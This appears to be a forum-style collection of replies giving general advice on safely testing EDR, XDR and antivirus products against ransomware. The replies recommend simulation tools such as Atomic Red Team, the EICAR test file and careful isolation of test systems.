Best Practices for Testing EDR/XDR/AV Against Ransomware and Malware

When testing, isolating your devices is essential, but keep in mind that if they’re completely air-gapped, you might not get accurate results. A lot of security products rely on cloud services for optimal detection, and if your devices aren’t online, they might not perform as well. Just something to think about!

I recommend checking out some additional tools that could be beneficial for your testing. For instance, Malpedia provides a comprehensive reference for malware families, and the Picus Emerging Threat Simulator is a great tool for simulating real-world threats. Good luck with your testing!

If you're looking to simulate attacks, you should focus on different stages like enumeration, installing RATs, and exfiltration tools. Test for unusual behavior rather than just waiting for malware to deploy. Make sure to check for things like PowerShell commands or unusual dropped files. Catching the early indicators of compromise is key!

Based on my experience, I’d suggest using simulation tools like AttackIQ or Atomic Red Team. This way, you can avoid the risks that come with isolation and learn what gets blocked or detected without worrying about the environment too much. Just keep in mind that trial versions might have some features turned off.

I've heard of someone who went ahead with testing and ended up infecting their company's network. Definitely be careful with this. Isolation can help, but running real examples can be risky if you're not managing the environment properly.

Honestly, I'm not convinced you need to go through the hassle of specific examples. VirusTotal has done a lot of the legwork already. For basic functionality checks, using an EICAR test file usually suffices. The malware samples might not offer anything new for testing detections anyway.